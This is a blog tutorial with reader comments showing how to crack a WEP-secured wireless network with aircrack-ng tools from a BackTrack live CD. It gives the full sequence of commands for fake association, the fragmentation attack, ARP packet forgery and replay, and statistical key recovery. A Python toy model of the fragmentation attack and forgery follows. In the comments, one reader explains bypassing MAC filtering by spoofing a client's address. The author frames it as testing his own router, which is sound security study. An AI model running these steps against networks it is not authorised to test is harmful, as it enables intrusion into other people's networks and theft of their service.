In case you weren’t aware, using WEP to secure your home network is a bit like putting a sign on your front door telling everyone that you do keep it locked, but that if they can work out your clue they’ll be able to find the key. And then leaving the key under the mat.
I’ve tried cracking WEP before with limited success: relying on the network being busy enough to capture packets doesn’t make for reliable cracking. This method is different, because it forces the access point to produce all the packets we need for analysis, whether or not anyone else is using the network. I thought it was time I finally proved to myself that it was possible, so I dug out the old BT Homehub, switched on the wireless and booted my MacBook Pro off an excellent pen test Live CD – BackTrack.
All you need is a machine with a wireless card that supports monitor mode and packet injection, the BackTrack CD, the MAC address of your target access point, the SSID (the network “name”) and the MAC address of your wireless card.
Once booted, here are the steps I took to obtain the WEP key for the network:
airmon-ng start wifi0 11
wlanconfig ath0 destroy
export AP=00:14:7F:95:5B:AC <-- Access Point MAC
export WIFI=00:14:51:XX:XX:XX <-- WLAN Card MAC
export SSID=BTHomeHub-1100 <-- SSID of target network
ifconfig ath1 up
iwconfig ath1 mode Monitor channel 11
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1
At this point you should see an “Association successful” message (the fake authentication in step one is what lets the access point accept frames from our MAC address later on). You can then continue with:
aireplay-ng -5 -b $AP -h $WIFI ath1
You’ll now have to wait until aireplay returns with a data packet it has found; when it asks whether to use it, say yes. It then runs the fragmentation attack against the access point and saves the result to a fragment-*.xor file (the name carries a date/time stamp, so substitute the real filename in the next command). That .xor file is not the WEP key: it is the RC4 keystream the access point used for one IV, recovered from the packet’s known plaintext header. Because WEP lets an IV be reused, that keystream is enough to encrypt a packet of our own choosing without knowing the key:
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request
This writes the forged packet, a broadcast ARP request encrypted with the keystream from the .xor file, to the file arp-request. Now it’s time to start capturing the packets we’re going to analyse (note the double dashes; airodump-ng writes the IVs to cap-01.ivs):
airodump-ng -c 11 --bssid $AP --ivs -w cap ath1
In a new console, start throwing the arp-request packet out to the access point:
aireplay-ng -2 -r arp-request ath1
When it finds our packet, say yes and it will start replaying it. Every replay makes the access point re-broadcast the ARP request under a fresh IV, which is exactly what aircrack needs, so you should see the #Data column in the airodump window start to skyrocket at this point. After you’ve got approximately 70000 data packets, start another console and run:
aircrack-ng -n 64 -b $AP *.ivs
This does the work of recovering the key statistically from the captured IVs (-n 64 tells it to try a 40-bit key; drop it, or use -n 128, if the network uses a 104-bit key). After a while (less than a minute for me) it will hopefully spit out something like the following:
Job done. Told you WEP was easy.
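The steps above lean on the tools to do the interesting part, so here is the mechanism behind aireplay-ng -5 and packetforge-ng spelled out in a toy Python model. This is an added example, not code from the original post or from aircrack-ng: it re-implements WEP framing (RC4 keyed with IV||key, unkeyed CRC-32 ICV), a simplified access point that reassembles fragments and relays them under its own IV (802.11 headers and fragment bookkeeping are omitted), and an attacker who never learns the key. The key, MAC addresses, IP addresses and starting IV are all constructed for the demonstration. Starting from the eight known LLC/SNAP bytes at the front of a sniffed ARP frame, the attacker grows 8 bytes of keystream into 1504 by bouncing forged fragments off the access point, then forges a broadcast ARP request (what packetforge-ng -0 with -k/-l 255.255.255.255 builds) that the access point accepts as valid.

```python
import struct
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream: key scheduling, then `length` bytes of PRGA output."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def with_icv(plaintext: bytes) -> bytes:
    """Append WEP's integrity check value: an unkeyed CRC-32 anyone can compute."""
    return plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV(3) | key index(1) | RC4(IV || key) XOR (plaintext || ICV)."""
    body = with_icv(plaintext)
    return iv + b"\x00" + xor(body, rc4(iv + key, len(body)))

def wep_decrypt(key: bytes, frame: bytes):
    """Plaintext if the ICV verifies, else None (the AP silently drops the frame)."""
    iv, enc = frame[:3], frame[4:]
    body = xor(enc, rc4(iv + key, len(enc)))
    return body[:-4] if with_icv(body[:-4]) == body else None

MAX_FRAGS = 16  # 802.11 permits up to 16 fragments per MSDU

class ToyAccessPoint:
    """Accepts fragments whose ICV verifies, reassembles them, relays the whole frame under a fresh IV."""
    def __init__(self, key: bytes):
        self.key, self.next_iv = key, 0x0A0B0C  # constructed starting IV

    def relay(self, fragments) -> bytes:
        parts = []
        for frag in fragments:
            pt = wep_decrypt(self.key, frag)
            if pt is None:
                raise ValueError("AP dropped a fragment: bad ICV")
            parts.append(pt)
        iv, self.next_iv = struct.pack(">I", self.next_iv)[1:], self.next_iv + 1
        return wep_encrypt(self.key, iv, b"".join(parts))

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")  # the 8 known bytes at the front of every ARP frame

def keystream_from_known_plaintext(frame: bytes, known: bytes):
    """(IV, keystream prefix) for one frame: what aireplay-ng saves in its fragment-*.xor file."""
    return frame[:3], xor(frame[4:4 + len(known)], known)

def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """Encrypt plaintext || ICV with recovered keystream only; WEP never rejects a reused IV."""
    body = with_icv(plaintext)
    if len(body) > len(keystream):
        raise ValueError("not enough keystream for this packet")
    return iv + b"\x00" + xor(body, keystream)

def fragmentation_attack(ap: ToyAccessPoint, captured: bytes, target_len: int = 1500):
    """Grow 8 bytes of keystream into target_len + 4 by bouncing forged fragments off the AP."""
    iv, ks = keystream_from_known_plaintext(captured, LLC_SNAP_ARP)  # 8 bytes to start with
    while len(ks) < target_len + 4:
        chunk = len(ks) - 4  # payload per fragment; 4 keystream bytes are spent on its ICV
        payload = bytes((i * 7) & 0xFF for i in range(min(chunk * MAX_FRAGS, target_len)))
        frags = [forge(iv, ks, payload[i:i + chunk]) for i in range(0, len(payload), chunk)]
        relayed = ap.relay(frags)  # the AP re-encrypts plaintext we chose, under its own IV
        iv, ks = keystream_from_known_plaintext(relayed, with_icv(payload))
    return iv, ks

def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP request plaintext, the packet packetforge-ng -0 assembles."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      sender_mac, sender_ip, b"\x00" * 6, target_ip)
    return LLC_SNAP_ARP + arp

def demo() -> dict:
    key = bytes.fromhex("0123456789")  # constructed 40-bit key; the attacker never sees it
    ap = ToyAccessPoint(key)
    # One legitimate ARP frame on the air (constructed client MAC/IPs): the packet aireplay-ng -5 waits for.
    sniffed = wep_encrypt(key, b"\x11\x22\x33", build_arp_request(
        bytes.fromhex("000c29112233"), b"\xc0\xa8\x01\x05", b"\xc0\xa8\x01\x01"))
    iv, ks = fragmentation_attack(ap, sniffed)
    # Forge the broadcast ARP request (-k 255.255.255.255 -l 255.255.255.255) without the key.
    arp = build_arp_request(bytes.fromhex("001451aabbcc"), b"\xff" * 4, b"\xff" * 4)
    forged = forge(iv, ks, arp)
    return {"keystream_len": len(ks),
            "keystream_correct": ks == rc4(iv + key, len(ks)),  # checkable only because we hold the key
            "ap_accepts_forgery": wep_decrypt(key, forged) == arp}

if __name__ == "__main__":
    print(demo())
```

Two things the model makes visible that the command sequence hides. First, the fragmentation attack never touches the key: it only ever learns RC4 output for particular IVs, and the access point accepts the forgery because the ICV is an unkeyed CRC and IV reuse is allowed. Second, the forged ARP request is useful precisely because the access point answers each replay with a new IV; the key itself only falls out of the statistical attack aircrack-ng runs over tens of thousands of those IVs, which is why the tutorial keeps replaying rather than stopping once the .xor file exists.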
Hi,
Good to see potentially a simple Macbook Pro solution.
I’ve got so far with it and it seems to be going alright up to the point where you start in a new console! First of all, how do you do that? (I’m sure I’ll see it in the brief instructions on load lol) and also which version of BackTrack are you using? I tried BackTrack 1 and it didn’t load correctly, BackTrack 2 appeared more hopeful!
Thanks
How long does it usually take for aireplay to return the packet it found? In my case it reads 40000 packets and still didn’t return anything. In tutorials strangely things happen fast (3000 packets, or I saw one with even 800).
I need the key
@Alex:
Yes, I was using BackTrack2, which is an outstanding bit of kit, recommended for any security consultants/geeks.
@Redrum:
I’ve had results varying from, as you say, 800 packets right up to over 50000. In my experience that has depended on signal strength. I’ve had results in seconds on several networks though.
@BTHomeHub-ABD6:
Your network key will be on the sticker on the back of the HomeHub, or are you attempting to break into your neighbour’s wireless? I was using my own HomeHub for testing; I can’t condone attempting to steal anyone else’s service.
hi,
I have a laptop loaded with Vista. I connected to a WiFi internet connection with a WEP secured key. I connected using the security code and it was working fine.
I was seeing the properties of my connection and unfortunately I deleted the security key, which I could not save on my laptop.
Is there any way to get it without going to see it at the router location?
Kindly provide the solution, which will be very useful to me.
Thanking you very much
kal
nice work!
my Tencent QQ: 510844822
Hello,
I have seen all of the posts about cracking WEP keys in 10 mins or less. But there are some factors to look at.
1. You should have a very good word list dictionary
2. The AP should be OPEN…. you should know the rest.
3. A PSK AP will be cracked if there is a client and it is not locked to accept only listed MAC addresses….
After saying all this, I guess you are wondering how I came to these conclusions. I have tested it in my house on my router. If you set the router to accept only listed MAC addresses, aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 isn’t going to work for you. But there is always a way around a problem. You could wait around until a client joins the WLAN and copy his MAC address. Now change your MAC address to his. You can then wait till he leaves, and you can start your work.
I am not a master in this, but just a student learning Network Security and trying to make it secure. Any knowledge on protection, please share with me.
Hello Howard, thanks for your easy wep steps
I am using BT3 Beta for USB. I’ve tried to hack my own wireless AP, with success (I was using WEP 128). Now I’m trying to “hack” my brother’s wireless AP (he knows about it),
but without success! (he uses open system, WEP 64-bit and no MAC filtering, channel 6)
I have an Atheros 5006 built into my notebook, and I can successfully authenticate with his AP.
But when I try to receive data packets to be saved as fragment.xor, nothing happens; it just continues to read packets, and it never stopped, even after 2 hours!
Here is the screen log:-
=======================================
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI ath1 (I am always using my actual MAC address, not a fake one)
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful
Everything OK, no error message here.
After that:
aireplay-ng -5 -b $AP -h $WIFI ath1
Waiting for a data packet
Read 21,293 packets (and it never stopped, even after 2 hours!)
========================================
I have also tried it on some other AP, to see if it
was my card or a config problem, but with the other AP I managed to save fragment.xor in less than 3 minutes!
I am stuck now. Any help would be appreciated.
Thank you and have a nice day.
I tried the BackTrack 2 live CD. The problem is I don’t know which wireless card I need (currently using my laptop’s built-in card). When I log on it says I can use Flux or KDE. I use KDE but the internet tutorials don’t work. There is one for Flux: “backtrack > analyzers > kismet”. When I do that nothing happens. I tried the command on KDE and Flux to run kismet; it won’t work.
any ideas? pleaseeeee!!!
sorry about spelling
Thanks for the informative how-to. After reading the comment that this works on a MacBook Pro, I decided to try it. I get as far as the first aireplay-ng command and no networks are found. Upon destroying ath0, KDE’s internet utilities cannot detect any wireless networks. Is there a different workaround if putting my Airport Extreme into passive mode doesn’t seem to be working? I know the AE card isn’t really supported in KisMAC, but I was led to believe it would work with BackTrack 3. Thanks!
I had this working yesterday and then rebooted to test again. Now I have the following issue:
aireplay-ng -5 -b $AP -h $WIFI ath1
Saving chosen packet in replay_src-0821-082546.cap
08:25:48 Data packet found!
08:25:48 Sending fragmented packet
08:25:48 Not enough acks, repeating…
08:25:48 Sending fragmented packet
08:25:49 No answer, repeating…
08:25:49 Trying a LLC NULL packet
08:25:49 Sending fragmented packet
08:25:51 No answer, repeating…
08:25:51 Sending fragmented packet
08:25:53 No answer, repeating…
08:25:53 Trying a LLC NULL packet
08:25:53 Sending fragmented packet
08:25:53 Not enough acks, repeating…
08:25:53 Trying a LLC NULL packet
08:25:53 Sending fragmented packet
08:25:54 No answer, repeating…
08:25:54 Sending fragmented packet
08:25:56 No answer, repeating…
08:25:56 Trying a LLC NULL packet
08:25:56 Sending fragmented packet
08:25:58 No answer, repeating…
08:25:58 Sending fragmented packet
08:25:58 Not enough acks, repeating…
08:25:58 Sending fragmented packet
08:25:59 No answer, repeating…
08:25:59 Trying a LLC NULL packet
08:25:59 Sending fragmented packet
08:26:01 Got a deauthentication packet!
08:26:06 No answer, repeating…
08:26:06 Sending fragmented packet
08:26:06 Got a deauthentication packet!
08:26:11 Not enough acks, repeating…
08:26:11 Sending fragmented packet
08:26:12 No answer, repeating…
08:26:12 Trying a LLC NULL packet
08:26:12 Sending fragmented packet
08:26:13 Not enough acks, repeating…
08:26:13 Trying a LLC NULL packet
08:26:13 Sending fragmented packet
08:26:13 Not enough acks, repeating…
08:26:13 Trying a LLC NULL packet
08:26:13 Sending fragmented packet
08:26:14 No answer, repeating…
08:26:14 Sending fragmented packet
08:26:16 No answer, repeating…
08:26:16 Still nothing, trying another packet…
I have tried changing my router to a channel that other routers are not using but this also does not help.
Anyone got any ideas on this?
doa